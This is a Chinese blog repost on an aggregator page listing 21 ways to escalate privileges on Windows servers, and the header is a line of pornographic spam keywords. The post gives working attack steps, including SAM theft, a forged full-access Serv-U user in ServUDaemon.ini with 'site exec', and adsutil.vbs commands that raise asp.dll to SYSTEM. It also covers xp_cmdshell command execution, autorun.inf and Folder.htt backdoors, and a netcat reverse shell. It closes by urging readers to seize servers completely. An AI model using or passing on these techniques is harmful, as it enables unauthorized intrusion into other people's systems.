日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

黑客攻防专题八:21种RING的提权方法

發(fā)布時間:2023/12/19 编程问答 20 豆豆
生活随笔 收集整理的這篇文章主要介紹了 黑客攻防专题八:21种RING的提权方法 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
好多都沒有成功,還是發(fā)來看看,看看思路,呵呵

??? 以下全部是本人提權(quán)時候的總結(jié) 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗總結(jié)。希望對朋友有幫助!

??? 1.radmin連接法

??? 條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。

??? 2.pcanywhere

??? C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去

??? 3.SAM破解

??? C:\WINNT\system32\config\ 下他的SAM 破解之

??? 4.SU密碼奪取

??? C:\Documents and Settings\All Users\「開始」菜單\程序\

??? 引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn)

??? 進去后,如果有權(quán)限修改ServUDaemon.ini,加個用戶上去,密碼為空

??? [USER=WekweN|1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues=

??? 這個用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限

??? 5.c:\winnt\system32\inetsrv\data\

??? 引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去,然后執(zhí)行

??? 6.SU溢出提權(quán)

??? 這個網(wǎng)上教程N多 不詳細講解了

??? 7.運行Csript

??? 引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限

??? 用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

??? 查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

??? 再將asp.dll加入特權(quán)一族

??? asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)

??? 我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

??? 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

??? 8.腳本提權(quán)

??? c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs

??? 9.VNC

??? 這個是小花的文章 HOHO

??? 默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

??? 我們可以用vncx4

??? 破解它,vncx4使用很簡單,只要在命令行下輸入

??? c:\>vncx4 -W

??? 然后順序輸入上面的每一個十六進制數(shù)據(jù),沒輸完一個回車一次就行了。

??? 10.NC提權(quán)

??? 給對方來個NC 但是條件是你要有足夠的運行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了

??? 11.社會工程學(xué)之GUEST提權(quán)

??? 很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號?手機號?盡量看看 HOHO

??? 12.IPC空連接

??? 如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

??? 13.替換服務(wù)

??? 這個不用說了吧?個人感覺相當復(fù)雜

??? 14.autorun .inf

??? autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個盤都可以的 不相信他不運行

??? 15.desktop.ini與Folder.htt

??? 引用:首先,我們現(xiàn)在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇“自定義文件夾”(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消“隱藏受保護的操作系統(tǒng)文件”)然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門

??? 16.su覆蓋提權(quán)

??? 本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

??? 17.SU轉(zhuǎn)發(fā)端口

??? 43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務(wù)器,IP填對方IP,帳號為LocalAdministrator 密碼為$ak#.1k;#1@$ak#.1k'>0@p">#1@$ak#.1k0@p?連接上后你就可以管理他的Serv-u了

??? 18.SQL帳戶密碼泄露

??? 如果對方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數(shù)據(jù)庫的ASP文件中看到),因為MSSQL是默認的SYSTEM權(quán)限。

??? 引用:對方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass中填入你所得到的用戶名與密碼。format選擇xp_cmdshell“%s”即可。然后點擊connect,連接上后就可以在CMD一欄中輸入你想要的CMD命令了

??? 19.asp.dll

??? 引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定相同)

??? 我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

??? 好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去

??? 了,注意,用法中的get和set,一個是查看一個是設(shè)置。還有就是你運行上面的你要到C:\Inetpub\AdminScripts>這個目錄下。

??? 那么如果你是一個管理員,你的機子被人用這招把asp提升為system權(quán)限,那么,這時,防的方法就是把asp.dll T出特權(quán)一族,也就是用set這個命令,覆蓋掉剛才的那些東東。

??? 20.Magic Winmail

??? 前提是你要有個webshell 引用:[url]http://www.eviloctal.com/forum/read.php[/url]?tid=3587這里去看吧

??? 21.DBO……

??? 其實 提升權(quán)限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務(wù)器控制到底

















本文轉(zhuǎn)自starger51CTO博客,原文鏈接:http://blog.51cto.com/starger/17253?,如需轉(zhuǎn)載請自行聯(lián)系原作者



總結(jié)

以上是生活随笔為你收集整理的黑客攻防专题八:21种RING的提权方法的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。